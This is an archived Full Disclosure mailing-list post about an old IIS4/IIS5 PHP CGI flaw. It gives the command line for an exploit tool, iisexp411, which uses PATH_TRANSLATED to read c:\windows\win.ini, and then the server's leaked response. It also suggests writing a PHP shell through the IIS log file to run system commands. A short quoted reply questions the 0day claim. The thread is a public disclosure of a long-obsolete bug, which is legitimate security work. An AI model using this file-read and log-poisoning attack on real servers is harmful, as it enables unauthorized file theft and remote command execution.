Full Disclosure mailing list archives
Re: iis cgi 0day
From: yuange <yuange1975 () hotmail com>
Date: Thu, 10 Apr 2014 02:25:45 +0000
Discovered in 2000 for IIS4\IIS5 0day. .php -> php.exe the exploit file ver 4.1.1 . http://seclists.org/fulldisclosure/2012/Apr/13 usage: iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini yuan can get the file c:\windows\win.ini HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 10 Apr 2014 02:11:37 GMT Connection: close X-Powered-By: PHP/4.0.0 Content-type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ivf=MPEGVideo m3u=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpv2=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wvx=MPEGVideo [SciCalc] layout=0 You can use the IIS log file write phpshell, execute the PHP call system cmd.
Date: Wed, 9 Apr 2014 23:11:28 +0300 From: kirils.solovjovs () kirils com To: yuange1975 () hotmail com Subject: Re: [FD] iis cgi 0day Sorry, I don't read Chinese. How is this a 0day? -- Kirils Solovjovs
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- iis cgi 0day yuange (Apr 09)
- Message not available
- Re: iis cgi 0day yuange (Apr 09)
- Message not available
- <Possible follow-ups>
- Re: iis cgi 0day YiFei Yang (Apr 10)
- Message not available
- Re: iis cgi 0day YiFei Yang (Apr 10)
- Message not available
- Re: iis cgi 0day Davide Davini (Apr 16)
- Re: iis cgi 0day Reindl Harald (Apr 16)
- Re: iis cgi 0day Homer Parker (Apr 18)
- Re: iis cgi 0day YiFei Yang (Apr 18)